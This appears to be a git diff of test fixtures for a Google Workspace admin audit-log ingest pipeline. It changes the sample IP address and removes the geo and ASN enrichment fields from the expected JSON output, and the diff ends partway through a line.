+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNGRADE_USER_FROM_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_ENROLLED_IN_TWO_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_USERLIST_CSV"}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"MOVE_USER_TO_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USER_PUT_IN_TWO_STEP_VERIFICATION_GRACE_PERIOD","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"RENAME_USER","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_STRONG_AUTH","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"SUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNDELETE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UNSUSPEND_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"UPGRADE_USER_TO_GPLUS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"0"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"USER_SETTINGS","name":"USERS_BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json index 06d3ae6126e..d406f2949e8 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log-expected.json @@ -11,7 +11,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -35,35 +35,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301156800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004798300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "DELETE_2SV_SCRATCH_CODES", "id": "1", @@ -100,7 +82,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -124,35 +106,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301187100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004807500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GENERATE_2SV_SCRATCH_CODES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "GENERATE_2SV_SCRATCH_CODES", "id": "1", @@ -188,7 +152,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -212,35 +176,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301192200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004813100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_DEVICE_TOKENS\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_3LO_DEVICE_TOKENS", "id": "1", @@ -271,7 +217,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -295,35 +241,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301207500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004818600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_3LO_TOKEN\",\"parameters\":[{\"name\":\"APP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "REVOKE_3LO_TOKEN", "id": "1", @@ -355,7 +283,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -379,35 +307,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301210400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004824Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ADD_RECOVERY_EMAIL", "id": "1", @@ -444,7 +354,7 @@ "user" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -468,35 +378,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:26.301212600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:57.004829400Z", + "original": 